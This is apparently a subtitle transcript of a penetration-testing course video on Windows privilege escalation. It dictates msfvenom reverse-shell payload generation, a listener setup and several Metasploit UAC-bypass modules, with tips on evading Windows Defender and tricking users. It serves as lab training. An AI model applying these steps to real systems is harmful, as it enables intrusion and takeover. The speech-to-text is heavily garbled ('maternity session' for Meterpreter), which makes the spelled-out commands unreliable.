1
00:00:00,120 --> 00:00:04,020
Welcome to part eleven of this module in this video.

2
00:00:04,020 --> 00:00:10,110
We're going to be looking at how to escalate our privileges on a Windows system in prior videos we've

3
00:00:10,110 --> 00:00:17,520
seen examples of how to use metal split Armitage and beef to gain a foothold against a target.

4
00:00:17,520 --> 00:00:24,570
The end goal for most of these attacks is ultimately to gain something like a mature fritter session

5
00:00:24,570 --> 00:00:31,200
or reverse shell where we can control the target and hopefully achieve persistent access in a perfect

6
00:00:31,200 --> 00:00:31,900
world.

7
00:00:31,920 --> 00:00:39,050
We gain some form of terminal that allows us to throw commands at the victim P.C. but then what.

8
00:00:39,120 --> 00:00:41,790
Once we have an interpreter where do we go from there.

9
00:00:41,790 --> 00:00:48,490
The techniques shown here work against Windows 7 Windows 8 and Windows 8 point 1.

10
00:00:48,600 --> 00:00:56,220
Our target for this video is going to be a Windows 10 64 bit professional installation running in another

11
00:00:56,220 --> 00:00:57,550
virtual box.

12
00:00:57,690 --> 00:01:03,480
So we will begin by loading up met a split which have already done to save time.

13
00:01:03,540 --> 00:01:15,000
If you need a refresher you just type service post rescue well start followed by MSF console keeping

14
00:01:15,000 --> 00:01:18,990
in mind that it does take some time to load in a prior video.

15
00:01:18,990 --> 00:01:25,470
We learned how to encode our payloads since the goal of this demonstration is to show how to escalate

16
00:01:25,470 --> 00:01:28,680
our privileges once we have a more chirped session.

17
00:01:28,680 --> 00:01:32,780
We aren't going to bother with encoding or anything fancy right now.

18
00:01:32,850 --> 00:01:36,620
Let's just go ahead and generate a generic payload with MSF venom.

19
00:01:36,660 --> 00:01:41,790
If you're using an older version of Kali and I'm not really sure why you would be but I'm just throwing

20
00:01:41,790 --> 00:01:42,560
this out there.

21
00:01:42,570 --> 00:01:48,870
The command would be MSF payload that command should be obsolete on all modern versions of the operating

22
00:01:48,870 --> 00:01:54,060
system however since we've already seen payload generation we'll make this quick.

23
00:01:54,060 --> 00:01:58,910
First we grab our network IP.

24
00:01:59,010 --> 00:02:03,300
Keep in mind that if you're doing this over the Internet you'll need to refer back to the video on port

25
00:02:03,300 --> 00:02:06,200
forwarding for instructions on how to set that up.

26
00:02:06,210 --> 00:02:07,400
If you haven't already.

27
00:02:07,450 --> 00:02:11,860
The if config command will show a SA current IP address.

28
00:02:12,000 --> 00:02:16,530
Mine is going to be tender 0 0 to 30.

29
00:02:16,530 --> 00:02:17,710
Yours will vary.

30
00:02:17,760 --> 00:02:19,330
Then we'll generate our payload.

31
00:02:19,380 --> 00:02:21,380
Again we're not doing anything fancy here.

32
00:02:21,390 --> 00:02:22,950
We've seen this all before.

33
00:02:23,310 --> 00:02:31,880
MSF venom TAC P windows forward slash interpreter forward slash reverse CCP.

34
00:02:32,010 --> 00:02:42,830
We're gonna set the L host to our current IP address the L port we'll leave at 4 4 4 4.

35
00:02:42,990 --> 00:02:52,540
Again you can change that if you want to tack f the XY better then forward slash route forward slash

36
00:02:52,900 --> 00:03:00,190
desktop forward slash and I'm going to call this payload 3 because that's I believe it's our third payload

37
00:03:00,760 --> 00:03:05,650
period ELC and press enter we'll give it a few moments for the payload to generate.

38
00:03:05,680 --> 00:03:08,710
I'm going to go through all of this quickly because you've seen it all before.

39
00:03:08,710 --> 00:03:14,970
This is mostly just a refresher to get us back to where we were in the prior video with more turpitude.

40
00:03:15,010 --> 00:03:21,610
And again if you want to follow along the target in this demonstration is Windows 10 but you can use

41
00:03:21,610 --> 00:03:27,190
a Windows 8 or a windows 7 machine these techniques should work against really any version of Windows

42
00:03:27,190 --> 00:03:29,510
going back I think to XP.

43
00:03:29,500 --> 00:03:31,900
Anything before that you're you're on your own.

44
00:03:31,990 --> 00:03:38,560
Once this is done we'll find the payload on our desktop and we'll need to transfer it over to our Windows

45
00:03:38,560 --> 00:03:39,430
machine.

46
00:03:39,430 --> 00:03:42,880
How you do this is up to you of course.

47
00:03:42,880 --> 00:03:49,090
If you're in virtual box you could use a shared folder or possibly a USP thumb drive or something of

48
00:03:49,090 --> 00:03:49,930
that nature.

49
00:03:49,930 --> 00:03:51,070
It really doesn't matter.

50
00:03:51,160 --> 00:03:55,620
But before we open the exploit let's get our multi handler up and running.

51
00:03:55,630 --> 00:03:58,320
So if you remember to do this we type.

52
00:03:58,330 --> 00:04:04,840
Use exploit forward slash multi forward slash handler.

53
00:04:04,840 --> 00:04:06,130
Pardon my typo there.

54
00:04:06,220 --> 00:04:12,220
As always the exploit appears in red as part of the prompt indicating that it is now loaded.

55
00:04:12,580 --> 00:04:19,210
Like before we give it our information so we're going to set l hosts.

56
00:04:20,050 --> 00:04:22,720
Again your IP address will vary.

57
00:04:22,720 --> 00:04:26,330
We will set the El port.

58
00:04:26,360 --> 00:04:27,440
Same as before.

59
00:04:27,440 --> 00:04:28,890
4 4 4 4.

60
00:04:29,120 --> 00:04:31,670
And then we type exploit.

61
00:04:31,670 --> 00:04:35,870
Now this should all be pretty familiar to you if you've been following along with these videos in order

62
00:04:35,930 --> 00:04:41,750
the reverse T P handler is now going to be listening for our connection so as soon as this comes up

63
00:04:41,780 --> 00:04:47,060
we're going to flip over to our windows 10 system and open up the payload which will then establish

64
00:04:47,060 --> 00:04:52,970
the maternity session with R. Kelly Linux machine once over here in our windows 10 machine.

65
00:04:52,970 --> 00:04:55,830
All we have to do is just double click on this payload.

66
00:04:55,850 --> 00:05:01,640
Again it doesn't matter how you get it over here may take a moment to load and we switch back to our

67
00:05:01,640 --> 00:05:05,890
Cally machine and we should see it the maternity session is now opening.

68
00:05:05,930 --> 00:05:06,780
There we go.

69
00:05:06,800 --> 00:05:08,870
Our maternity session is now open.

70
00:05:09,020 --> 00:05:10,250
So far so good.

71
00:05:10,250 --> 00:05:14,210
If you've been following along with these videos in order you've seen all of this already.

72
00:05:14,210 --> 00:05:16,830
But now this is where things get interesting.

73
00:05:16,890 --> 00:05:18,940
Armor chapter session is now open.

74
00:05:19,010 --> 00:05:20,320
So far so good.

75
00:05:20,330 --> 00:05:24,010
If you'd been following along with these videos in order you've seen all this already.

76
00:05:24,020 --> 00:05:25,910
But this is where things get interesting.

77
00:05:25,910 --> 00:05:30,890
The first thing we're going to do is we're going to type background in return fritter.

78
00:05:30,920 --> 00:05:35,980
This is going to place the maturity process itself into the background so that we can work within met

79
00:05:35,980 --> 00:05:40,570
a split but it will keep the connection alive for us to come back to.

80
00:05:40,580 --> 00:05:49,370
Next we're going to load up a second exploit called bypass UAC injection so we're gonna type use exploit

81
00:05:49,580 --> 00:05:58,760
forward slash windows forward slash local forward slash bypass UAC underscore an injection and we're

82
00:05:58,760 --> 00:06:00,860
going to do show options.

83
00:06:00,860 --> 00:06:08,480
We can see when we list options that it requires a session so we type sessions and we can see that arm

84
00:06:08,480 --> 00:06:17,720
or trumpeter session is number one listed under I.D. So we're going to set the session to 1 and show

85
00:06:17,720 --> 00:06:21,220
options again OK.

86
00:06:21,290 --> 00:06:23,090
And we're going to run

87
00:06:27,250 --> 00:06:32,700
I made a mistake but this is somewhat fortunate because it is something that I wanted to touch on anyway.

88
00:06:32,710 --> 00:06:36,990
The exploit was expecting a 32 bit target by default.

89
00:06:37,120 --> 00:06:44,170
And that is the case with a lot of these exploits where it defaults to 32 bit and then it breaks when

90
00:06:44,170 --> 00:06:46,870
you use it against a 64 bit operating system.

91
00:06:46,870 --> 00:06:51,610
And really how often do you come across a 32 bit system nowadays anyway.

92
00:06:51,640 --> 00:06:57,310
It really should default to 64 but since it doesn't there is usually a way to specify this within the

93
00:06:57,310 --> 00:06:58,740
exploit options.

94
00:06:58,810 --> 00:07:10,180
In this case we're just going to type set payload windows forward slash X 64 for 64 bit forward slash

95
00:07:10,190 --> 00:07:22,540
interpreter forward slash reverse underscore TS C P and then we're going to set target 1 to specify

96
00:07:23,190 --> 00:07:32,230
a 64 bit operating system target 0 would specify 32 bit and we'll show options again now as we can see

97
00:07:33,070 --> 00:07:41,050
windows 64 bit has been specified and our payload now specifies 64 bit so I'm sorry for that little

98
00:07:41,050 --> 00:07:44,170
mistake but it was handy to illustrate how to do this.

99
00:07:44,260 --> 00:07:52,030
So once that's done we're gonna type run and if you bump into this problem with other exploits or modules

100
00:07:52,150 --> 00:07:55,470
it is important to remember that you have to set the architecture.

101
00:07:55,480 --> 00:08:01,340
Sometimes it isn't immediately apparent in the options just how you're supposed to do that.

102
00:08:01,510 --> 00:08:05,230
So you may need to read up on the module a bit.

103
00:08:05,230 --> 00:08:10,450
Now do you keep in mind that fully updated Windows Defender is going to catch on encoded payload and

104
00:08:10,450 --> 00:08:10,990
delete it.

105
00:08:10,990 --> 00:08:16,540
But again we've already seen some methods of encoding payloads and right now we just want to see privilege

106
00:08:16,600 --> 00:08:20,100
escalation okay.

107
00:08:20,110 --> 00:08:27,640
So as you can see I actually had to run the exploit twice and I'm not really sure why it failed on the

108
00:08:27,640 --> 00:08:30,860
first try sometimes.

109
00:08:30,890 --> 00:08:38,750
These these exploits they will just fail for no reason and running it twice can sometimes work.

110
00:08:38,930 --> 00:08:40,220
In this case it did.

111
00:08:40,250 --> 00:08:44,300
In any event we now have a second mature session open.

112
00:08:44,330 --> 00:08:49,330
So now if we get system we can see that we have admin.

113
00:08:49,460 --> 00:08:54,290
We can also get UI D and we can see that we have authority system.

114
00:08:54,340 --> 00:08:57,350
Okay so that was one way of doing things.

115
00:08:57,530 --> 00:09:02,590
Now we're going to put this session into the background and then use another module

116
00:09:05,210 --> 00:09:09,850
before we do that we'll type sessions again.

117
00:09:09,860 --> 00:09:16,180
We don't need this many maternal fritters open at once so let's use Tak K to kill off the first session.

118
00:09:16,430 --> 00:09:23,660
But notice that under the session information you can see which active sessions have authority system

119
00:09:23,960 --> 00:09:25,040
and which don't.

120
00:09:25,070 --> 00:09:26,390
This is important.

121
00:09:26,390 --> 00:09:32,420
If you were running a server or something of that nature and you had a lot of maturity sessions running

122
00:09:32,480 --> 00:09:35,210
simultaneously to different computers at once.

123
00:09:35,240 --> 00:09:45,440
So let's go ahead and we'll do sessions TAC K for kill and we'll kill the first session there we go.

124
00:09:45,500 --> 00:09:47,480
Now we'll load up our next module.

125
00:09:47,510 --> 00:09:51,500
Ask to see if what we want to do next is going to work or not.

126
00:09:51,770 --> 00:10:03,170
So we're going to do use exploit forward slash windows forward slash local forward slash ask show options

127
00:10:04,380 --> 00:10:08,390
and we're going to set session to two.

128
00:10:08,460 --> 00:10:19,230
We're going to set targets to one for 64 bit and last but not least we're going to set the technique

129
00:10:19,380 --> 00:10:26,940
which is EMC by default to PSA H because this will have a better chance of not being detected by Windows

130
00:10:26,940 --> 00:10:33,210
Defender and I'm going to run this and as I do I'm going to flip over to the Windows 10 side of the

131
00:10:33,300 --> 00:10:36,900
virtual system so that you can see what the user sees.

132
00:10:36,900 --> 00:10:43,650
This module is going to prompt the user for authentication so in order for it to be successful the user

133
00:10:43,650 --> 00:10:47,820
is going to have to click yes and that can give the game away.

134
00:10:47,820 --> 00:10:53,070
So I'm not saying that this particular approach is the best way of doing things but if you actually

135
00:10:53,070 --> 00:10:59,850
do for the user into answering the question that the ask module presents the user with it then you will

136
00:10:59,850 --> 00:11:03,030
also gain authority system through that maturity session.

137
00:11:03,030 --> 00:11:05,070
So again this is just a different way of doing it.

138
00:11:05,160 --> 00:11:08,790
So I've gone ahead and put us into windowed mode and cleared the screen.

139
00:11:08,880 --> 00:11:15,150
We're going to run the module and then we're going to flip over to Windows 10 and hopefully we'll see

140
00:11:15,150 --> 00:11:16,480
something happen on this end.

141
00:11:16,500 --> 00:11:26,750
If the exploit works now we can see that this exploit failed due to a timeout and I'm going to put this

142
00:11:26,750 --> 00:11:29,360
one down to Windows 10.

143
00:11:29,360 --> 00:11:36,710
However a power Shell did open up on the Windows 10 user desktop and how wasn't supposed to happen if

144
00:11:36,710 --> 00:11:42,070
we were in Windows eight point one or Windows 7 and probably Windows XP as well.

145
00:11:42,170 --> 00:11:48,410
What would happen is that the user would get a command prompt asking to authorize windows power shell

146
00:11:48,800 --> 00:11:54,410
if the user clicks Yes then the power Shell will open but it will open in the background and it will

147
00:11:54,650 --> 00:11:57,110
apply only to armor trumpeter session.

148
00:11:57,110 --> 00:12:05,270
It appears that Windows 10 doesn't have that safeguard I guess which has foiled the exploit because

149
00:12:05,600 --> 00:12:10,910
here we just have a blank power shell opening up in the user's face which is not useful to us.

150
00:12:10,910 --> 00:12:15,060
So this particular exploit has failed but that's all right.

151
00:12:15,080 --> 00:12:17,930
This is why we test these things ahead of time.

152
00:12:17,930 --> 00:12:22,970
I admit I'm a little bit taken by surprise that this exploit didn't work against windows 10 but that

153
00:12:22,970 --> 00:12:24,240
can happen.

154
00:12:24,500 --> 00:12:29,430
Now fortunately we have a lot more exploits to choose from.

155
00:12:29,540 --> 00:12:33,490
I've used ask very successfully against windows 8 and Windows 7.

156
00:12:33,500 --> 00:12:37,540
So not sure what happened there but we'll try.

157
00:12:37,540 --> 00:12:48,650
Use exploit forward slash windows forward slash local forward slash bypass the way C but this time we're

158
00:12:48,650 --> 00:12:56,270
going to press tab twice for auto completion and just like in recon and G that's going to pull up all

159
00:12:56,270 --> 00:13:00,590
of the potential ways that we could complete this this path.

160
00:13:00,590 --> 00:13:07,670
These are all approaches that we can take some may work and like the ask module that we just saw some

161
00:13:07,670 --> 00:13:08,930
may not.

162
00:13:08,930 --> 00:13:12,140
So it's always important to test these things ahead of time.

163
00:13:12,140 --> 00:13:25,720
Let's try the bypass UAC event BW R so we'll do underscore event B W R and we're going to do show options.

164
00:13:25,890 --> 00:13:28,110
We need to specify a session

165
00:13:31,720 --> 00:13:35,350
which is still to in my case yours will vary

166
00:13:39,880 --> 00:13:45,190
so we'll set session two and we will once again set the payload

167
00:13:51,740 --> 00:14:03,430
to Windows forward slash X 64 forward slash interpreter Ford slash interpreter forward slash reverse

168
00:14:03,520 --> 00:14:12,140
underscore DCP will set target one we'll show the options.

169
00:14:12,160 --> 00:14:19,180
OK so now we're up against day windows 64 bit everything else we'd set the L host

170
00:14:22,400 --> 00:14:32,900
if configured necessary set l host in my case it's ten dot 0.01 forty five show options again

171
00:14:36,300 --> 00:14:47,250
list files and will once again get the UI D exploit has worked this new session has authority system

172
00:14:48,750 --> 00:14:52,680
can also do get system in memory admin OK.

173
00:14:52,740 --> 00:14:57,930
All right so that covers a few basic examples of how to get a mature prettier session with elevated

174
00:14:57,930 --> 00:15:05,220
privileges and there are obviously more modules that you can try as you saw and they all work essentially

175
00:15:05,220 --> 00:15:12,030
the same way of course a fully updated operating system is going to be more resistant so you do need

176
00:15:12,030 --> 00:15:17,460
to be careful if you wish to avoid detection each module is pretty much going to have the same options

177
00:15:17,460 --> 00:15:23,730
you'll need to set the sessions you'll need to set the target you'll probably need to set the L host

178
00:15:23,730 --> 00:15:29,190
as well and the L port remember you'll need to use Port forwarding if you're doing this over the Internet

179
00:15:29,340 --> 00:15:34,260
and I think last but not least I'll point out that if you wish to switch between sessions you would

180
00:15:34,260 --> 00:15:38,940
just type sessions TAC AI and then the session no.

181
00:15:38,970 --> 00:15:44,910
So if you have more turpitude sessions in the background for example session three typing that and pressing

182
00:15:44,940 --> 00:15:48,420
Enter would reactivate an interpreter session three.

183
00:15:48,720 --> 00:15:51,720
So that's just something to keep in mind.

184
00:15:51,750 --> 00:15:58,410
And finally if you come across a module without clear instructions on how to set the target architecture

185
00:15:58,410 --> 00:16:04,470
or the payload or really any other option for that matter just do a quick search with the module name

186
00:16:04,500 --> 00:16:09,540
and the parameter that you're having trouble with and you should be able to find numerous syntax examples

187
00:16:09,580 --> 00:16:15,240
with an authority system interpreter session you can do just about anything on the target machine without

188
00:16:15,240 --> 00:16:18,610
it being visible to the end user at least within reason.

189
00:16:18,630 --> 00:16:24,150
Once you have authority you can work on establishing a persistent foothold on the target computer as

190
00:16:24,150 --> 00:16:24,570
always.

191
00:16:24,570 --> 00:16:30,030
Practice makes perfect playing around with these techniques and virtual systems is really the best way

192
00:16:30,060 --> 00:16:32,550
to see what works and what doesn't.

193
00:16:32,610 --> 00:16:33,570
And as always.

194
00:16:33,570 --> 00:16:38,700
Never use anything shown in these videos against any target that you do not have written permission

195
00:16:38,700 --> 00:16:44,520
from the owner to penetration test be lawful and ethical at all times.

196
00:16:44,550 --> 00:16:46,520
Thank you and I'll see you in the next lesson.